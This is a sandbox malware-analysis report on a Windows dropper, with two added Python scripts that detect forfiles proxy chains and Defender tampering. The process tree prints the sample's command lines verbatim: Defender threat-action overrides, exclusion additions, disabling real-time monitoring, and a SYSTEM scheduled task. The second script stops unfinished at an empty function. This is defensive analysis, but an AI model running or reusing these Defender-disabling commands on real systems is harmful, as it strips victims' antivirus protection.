Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 245s
max time network: 246s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 26/08/2024, 05:01 UTC
Static task: static1
Behavioral task: behavioral1
  Sample: 35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: 35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe
  Resource: win10-20240404-en
General
Target: 35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe
Size: 7.3MB
MD5: d899e1c3b4b597f35991ad001796efb6
SHA1: 74b306cc449fab5ca903c480a953c4390660cca4
SHA256: 35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549
SHA512: 99220fbfc50497a6c194a0adff91ab88d8617d71572e787896d11ba374d936acdc4fa2ab519d494cc5c6a0f1bd2d19158f3bed4a782827e88f51c562a9c1daa0
SSDEEP: 196608:91OlKUM0XQhhsNRl31gOfczhFgsm7BrrcfWMhbr0Ow6mrjKLlT:3OlQ0U+pfcFCsm7BrrcfXG6JLl
Malware Config
Signatures
Key created: \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection (reg.exe, ×2)
Set value (int): \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" (reg.exe, ×2)
Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe, ×10)
Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe, ×10)
Set value (int) = "0" under \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (reg.exe):
  C:\ProgramData\BiTaXhratCGNPnVB
  C:\Windows\Temp\ErKIoDgHiflivqkZ (×2)
  C:\Program Files (x86)\MivewcCGXeCU2
  C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions
  C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi
  C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR
  C:\Program Files (x86)\rksWaXujU
  C:\Program Files (x86)\BnSeAqsvAhUdC
  C:\Program Files (x86)\TusZhOGSSwUn
Set value (int) = "0" under \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (reg.exe):
  C:\Program Files (x86)\MivewcCGXeCU2
  C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions
  C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi
  C:\Program Files (x86)\BnSeAqsvAhUdC
  C:\ProgramData\BiTaXhratCGNPnVB
  C:\Program Files (x86)\TusZhOGSSwUn
  C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR
  C:\Windows\Temp\ErKIoDgHiflivqkZ (×2)
  C:\Program Files (x86)\rksWaXujU
Blocklisted process makes network request 1 IoCs
flow 28, pid 2704, rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Runs PowerShell with its display window hidden.
pid / Process: 2304 powershell.exe; 3036 powershell.exe; 2276 powershell.EXE; 1356 powershell.exe; 2136 powershell.exe; 2088 powershell.exe; 1520 powershell.exe; 2396 powershell.EXE; 1628 powershell.EXE; 2204 powershell.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (rundll32.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (Install.exe)
Checks computer location settings 2 TTPs 1 IoCs
Looks up the country code configured in the registry, likely for geofencing.
Key value queried: \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Control Panel\International\Geo\Nation (gLYDEcB.exe)
Executes dropped EXE 4 IoCs
pid / Process: 2312 Install.exe; 2116 Install.exe; 2068 YBLNFyl.exe; 612 gLYDEcB.exe
Indirect Command Execution 1 TTPs 19 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
forfiles.exe pids: 2092, 768, 2256, 2836, 2700, 2572, 1560, 2996, 2748, 848, 2288, 496, 1696, 1392, 2720, 2764, 804, 684, 2760
Loads dropped DLL 23 IoCs
pid / Process (tallied): 3040 35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe ×1; 2312 Install.exe ×4; 2116 Install.exe ×3; 1148 WerFault.exe ×3; 2704 rundll32.exe ×4; 1720 WerFault.exe ×5; 2028 WerFault.exe ×3
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops Chrome extension 2 IoCs
File created: C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json (gLYDEcB.exe)
File created: C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json (gLYDEcB.exe)
Drops file in System32 directory 27 IoCs
File opened for modification: \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe, ×7)
File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.EXE, ×3)
File created: C:\Windows\system32\GroupPolicy\Machine\Registry.pol (YBLNFyl.exe)
File created: C:\Windows\system32\GroupPolicy\gpt.ini (YBLNFyl.exe)
File opened for modification: C:\Windows\system32\GroupPolicy\Machine\Registry.pol (YBLNFyl.exe)
File opened for modification: C:\Windows\system32\GroupPolicy\gpt.ini (YBLNFyl.exe)
File opened for modification: C:\Windows\system32\GroupPolicy\Machine\Registry.pol (gLYDEcB.exe)
File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat (gLYDEcB.exe)
File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat (rundll32.exe)
File opened for modification under C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache (gLYDEcB.exe):
  Content\B3513D73A177A2707D910183759B389B_5CF45833F44BFC2995315451A3896ACA
  MetaData\B3513D73A177A2707D910183759B389B_5CF45833F44BFC2995315451A3896ACA
  Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
  MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
  Content\C02877841121CC45139CB51404116B25_9CE832D646FBAFC5C4ACFC523FDD84AD
  MetaData\C02877841121CC45139CB51404116B25_9CE832D646FBAFC5C4ACFC523FDD84AD
  Content\05DDC6AA91765AACACDB0A5F96DF8199
  MetaData\05DDC6AA91765AACACDB0A5F96DF8199
  Content\DDE8B1B7E253A9758EC380BD648952AF_68D058512F3515153DEB95A1F4E72552
  MetaData\DDE8B1B7E253A9758EC380BD648952AF_68D058512F3515153DEB95A1F4E72552
Drops file in Program Files directory 13 IoCs
All by gLYDEcB.exe:
File created: C:\Program Files (x86)\rksWaXujU\EFzTpY.dll
File created: C:\Program Files (x86)\rksWaXujU\dgpWayZ.xml
File created: C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR\izElhPb.xml
File created: C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR\WByYeZD.dll
File created: C:\Program Files (x86)\BnSeAqsvAhUdC\nYKHVyW.xml
File created: C:\Program Files (x86)\BnSeAqsvAhUdC\xpBUDGD.dll
File created: C:\Program Files (x86)\MivewcCGXeCU2\jEUFkzwTnpFYz.dll
File created: C:\Program Files (x86)\MivewcCGXeCU2\pfpSGyE.xml
File created: C:\Program Files (x86)\TusZhOGSSwUn\eIsLsWF.dll
File created: C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi
File opened for modification: C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi
File created: C:\Program Files\Mozilla Firefox\browser\omni.ja.bak
File opened for modification: C:\Program Files\Mozilla Firefox\browser\omni.ja
Drops file in Windows directory 4 IoCs
File created: C:\Windows\Tasks\bWNXgrRlacKgnUwPKK.job (schtasks.exe)
File created: C:\Windows\Tasks\mVwrlHrSDNRLOGqZG.job (schtasks.exe)
File created: C:\Windows\Tasks\AlVsOicJKGYGSUS.job (schtasks.exe)
File created: C:\Windows\Tasks\KOXGBKFkHUHlhNtav.job (schtasks.exe)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 3 IoCs
pid / pid_target / Process / procid_target:
1148 / 2068 / WerFault.exe / 61
1720 / 2116 / WerFault.exe / 31
2028 / 612 / WerFault.exe / 224
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by process (tallied): reg.exe ×21; cmd.exe ×15; forfiles.exe ×10; schtasks.exe ×8; WMIC.exe ×3; and once each by 35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe, Install.exe, gLYDEcB.exe, rundll32.exe, powershell.exe, wscript.exe and gpupdate.exe
Enumerates system info in registry 2 TTPs 4 IoCs
Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (Install.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (Install.exe)
Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (rundll32.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (rundll32.exe)
Modifies data under HKEY_USERS 64 IoCs
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
schtasks.exe pids: 2860, 1784, 2980, 3024, 1860, 1932, 448, 2188, 2672, 2404, 1972, 1980
Suspicious behavior: EnumeratesProcesses 39 IoCs
pid / Process (tallied): 2304 powershell.exe ×3; 3036 powershell.exe ×1; 1520 powershell.exe ×3; 2396 powershell.EXE ×3; 2276 powershell.EXE ×3; 1356 powershell.exe ×1; 1628 powershell.EXE ×3; 2136 powershell.exe ×3; 2088 powershell.exe ×1; 2204 powershell.exe ×1; 612 gLYDEcB.exe ×17
Suspicious use of AdjustPrivilegeToken 64 IoCs
Token: SeDebugPrivilege, pids 2304 (powershell.exe), 3036 (powershell.exe), 1520 (powershell.exe), 2396 (powershell.EXE), 2276 (powershell.EXE), 1356 (powershell.exe), 1628 (powershell.EXE), 2136 (powershell.exe), 2088 (powershell.exe), 2204 (powershell.exe)
3004 WMIC.exe, Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
2728 WMIC.exe, Token: SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege
1276 WMIC.exe, Token: SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege
2216 WMIC.exe, Token: SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege (list stops at the 64-IoC limit)
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target
PID 3040 wrote to memory of 2312 3040 35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe 30 (7 records)
PID 2312 wrote to memory of 2116 2312 Install.exe 31 (7 records)
PID 2116 wrote to memory of 2072 2116 Install.exe 32 (7 records)
PID 2072 wrote to memory of 2288 2072 cmd.exe 34 (7 records)
PID 2288 wrote to memory of 2184 2288 forfiles.exe 35 (7 records)
PID 2184 wrote to memory of 2460 2184 cmd.exe 36 (7 records)
PID 2072 wrote to memory of 2720 2072 cmd.exe 37 (7 records)
PID 2720 wrote to memory of 2716 2720 forfiles.exe 38 (7 records)
PID 2716 wrote to memory of 2752 2716 cmd.exe 39 (7 records)
PID 2072 wrote to memory of 2760 2072 cmd.exe 40 (1 record; the list stops at the 64-entry cap)
Identical records are collapsed above with their counts. The target of every record is the child the writer is starting (the same pids appear as parent and child in the Processes tree below), so this is ordinary process creation, during which the parent writes the child's start-up data, and not injection into an unrelated process. De-duplicated, the list is the creation chain sample → Install.exe → Install.exe → cmd.exe → forfiles.exe → cmd.exe → reg.exe, taken twice, plus the start of a third forfiles.exe.
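The value of this list is the parent/child structure it encodes, not the individual writes. The Python below is an added example, not Triage's code or anything from the sample, that parses records of the shape shown above, collapses the repeats, rebuilds the parent map and flags forfiles.exe → cmd.exe → reg.exe chains. The record text is a constructed subset of the list above and the pid-to-image map is constructed from the Processes tree on this page, because these records only name the writer, so leaf processes (the reg.exe instances) need their image name from elsewhere.

```python
"""Rebuild the process tree from Triage 'wrote to memory of' records and flag
LOLBin proxy chains (forfiles.exe -> cmd.exe -> reg.exe) in it."""
import re
from collections import Counter

# Constructed input: a subset of the WriteProcessMemory IoCs above, with a few
# of the repeated records kept to show the de-duplication.
WPM_RECORDS = """
PID 3040 wrote to memory of 2312 3040 35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe 30
PID 3040 wrote to memory of 2312 3040 35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe 30
PID 3040 wrote to memory of 2312 3040 35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe 30
PID 2312 wrote to memory of 2116 2312 Install.exe 31
PID 2312 wrote to memory of 2116 2312 Install.exe 31
PID 2116 wrote to memory of 2072 2116 Install.exe 32
PID 2072 wrote to memory of 2288 2072 cmd.exe 34
PID 2288 wrote to memory of 2184 2288 forfiles.exe 35
PID 2184 wrote to memory of 2460 2184 cmd.exe 36
PID 2072 wrote to memory of 2720 2072 cmd.exe 37
PID 2720 wrote to memory of 2716 2720 forfiles.exe 38
PID 2716 wrote to memory of 2752 2716 cmd.exe 39
PID 2072 wrote to memory of 2760 2072 cmd.exe 40
"""

# Constructed from the Processes section of this page: the records only name
# the *writer*, so leaf processes need their image name from the tree.
IMAGE_BY_PID = {
    3040: "35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe",
    2312: "Install.exe", 2116: "Install.exe", 2072: "cmd.exe",
    2288: "forfiles.exe", 2184: "cmd.exe", 2460: "reg.exe",
    2720: "forfiles.exe", 2716: "cmd.exe", 2752: "reg.exe", 2760: "forfiles.exe",
}

# "PID <writer> wrote to memory of <target> <writer> <image> <procid_target>"
RECORD_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) \d+")


def parse_wpm(text):
    """Return ({(writer, target): count}, {writer_pid: image}) from the record text."""
    edges, images = Counter(), {}
    for line in text.strip().splitlines():
        m = RECORD_RE.match(line.strip())
        if m:
            writer, target, image = int(m.group(1)), int(m.group(2)), m.group(3)
            edges[(writer, target)] += 1
            images[writer] = image
    return edges, images


def build_parent_map(edges):
    """child pid -> parent pid; the first process to write into a pid created it."""
    parent = {}
    for writer, target in edges:
        parent.setdefault(target, writer)
    return parent


def ancestry(pid, parent):
    """Root-first list of pids from the top of the tree down to `pid`."""
    chain = [pid]
    while chain[-1] in parent and parent[chain[-1]] not in chain:
        chain.append(parent[chain[-1]])
    return chain[::-1]


def find_chains(parent, images, pattern=("forfiles.exe", "cmd.exe", "reg.exe")):
    """pid tuples whose last len(pattern) ancestors carry exactly those image names."""
    want = [p.lower() for p in pattern]
    hits = []
    for pid in parent:
        tail = ancestry(pid, parent)[-len(want):]
        if len(tail) == len(want) and [images.get(p, "").lower() for p in tail] == want:
            hits.append(tuple(tail))
    return sorted(hits)


if __name__ == "__main__":
    edges, writers = parse_wpm(WPM_RECORDS)
    parent = build_parent_map(edges)
    images = {**IMAGE_BY_PID, **writers}
    for (w, t), n in edges.items():
        print(f"{w} {images[w]} -> {t} {images.get(t, '?')} ({n} records)")
    for chain in find_chains(parent, images):
        print("proxy chain:", " -> ".join(f"{images[p]}({p})" for p in chain))
```

The pattern argument is what makes this reusable: swap in ("forfiles.exe", "cmd.exe", "powershell.exe") to catch the gpupdate and WMIC branches of the same tree, and feed real Sysmon event 1 parent/child pairs instead of sandbox records once the parse step is adapted.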
Processes
-
C:\Users\Admin\AppData\Local\Temp\35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe"C:\Users\Admin\AppData\Local\Temp\35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Users\Admin\AppData\Local\Temp\7zSC67A.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Users\Admin\AppData\Local\Temp\7zSC8CB.tmp\Install.exe.\Install.exe /ldidp "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"5⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2184 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:2460
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"5⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵
- System Location Discovery: System Language Discovery
PID:2752
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"5⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2760 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2816
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵
- System Location Discovery: System Language Discovery
PID:2820
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"5⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2836 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:2848 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:3068
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵
- Indirect Command Execution
PID:2764 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵PID:2740
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force8⤵PID:2608
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Indirect Command Execution
PID:2700 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵PID:3016
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3036 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWNXgrRlacKgnUwPKK" /SC once /ST 05:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi\iXTuROILDACSXYD\YBLNFyl.exe\" Hi /gdpdidfiz 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 6764⤵
- Loads dropped DLL
- Program crash
PID:1720
-
-
-
-
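The subtree above is one LOLBin pattern repeated: forfiles.exe is given a directory and a file mask that always match something in System32 (where.exe, calc.exe, waitfor.exe, help.exe, ping.exe) and runs its /c command once per match, so reg.exe and powershell.exe get forfiles.exe rather than the installer as their parent. The reg commands write four threat IDs under the Policies ThreatIDDefaultAction key with data 6, which is the Defender "Allow" action for that threat, and the gpupdate /force that follows makes Defender re-read the policy; the report does not say which detections those four IDs stand for. The WMIC call adds a file-extension exclusion through the MSFT_MpPreference class. Further down, once YBLNFyl.exe runs as SYSTEM, the same logic sets DisableRealtimeMonitoring=1, adds its drop directories to Exclusions\Paths under both registry views (/reg:32 and /reg:64, because the 32-bit installer runs under WoW64 and would otherwise only reach Wow6432Node) and then deletes DisableRealtimeMonitoring again once the exclusions are in place. The Python below is an added example, not code from Triage or from the sample, that peels the forfiles and cmd /C wrapping and turns command lines of this kind into findings. The sample command lines are lifted from this page with one unrelated line added as a negative control; the ACTION_NAMES table follows the documented data values of the ThreatIDDefaultAction policy.

```python
"""Extract Windows Defender tampering from process command lines, unwrapping the
forfiles /c "cmd /C ..." proxying seen in the tree above first."""
import re

# Constructed input: command lines lifted from the process tree on this page,
# plus one unrelated reg add as a negative control.
SAMPLE_COMMAND_LINES = [
    r'forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"',
    r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6',
    r'"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64',
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:32',
    r'REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32',
    r'reg add "HKCU\Software\Contoso" /v Foo /d 1',
]

# ThreatIDDefaultAction data values from the Defender policy documentation.
ACTION_NAMES = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow"}

# forfiles runs its /c command once per file matched by /p and /m; embedded
# quotes inside that command are written as \".
FORFILES_RE = re.compile(r'forfiles(?:\.exe)?"?\s.*?/c\s+"((?:\\.|[^"\\])*)"\s*$', re.I)
CMD_C_RE = re.compile(r'^"?(?:[^"\s]*\\)?cmd(?:\.exe)?"?\s+/c\s+(.*)$', re.I)
THREAT_RE = re.compile(r'ThreatIDDefaultAction"?\s.*?/v\s+(\d+).*?/d\s+(\d+)', re.I)
EXCL_EXT_RE = re.compile(r'MSFT_MpPreference\s+call\s+Add\s+ExclusionExtension=([^\s"]+)', re.I)
EXCL_PATH_RE = re.compile(r'Windows Defender\\Exclusions\\Paths"\s.*?/v\s+"([^"]+)"', re.I)
RTP_RE = re.compile(r'\breg(?:\.exe)?"?\s+(add|delete)\s+"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-time Protection".*?DisableRealtimeMonitoring', re.I)
VIEW_RE = re.compile(r'/reg:(32|64)\b', re.I)


def unwrap_proxies(cmd):
    """Peel forfiles /c "..." and cmd /C wrappers until the innermost command is left."""
    while True:
        m = FORFILES_RE.search(cmd)
        if m:
            cmd = m.group(1).replace('\\"', '"')
            continue
        m = CMD_C_RE.match(cmd)
        if m:
            cmd = m.group(1)
            continue
        return cmd


def classify(cmd):
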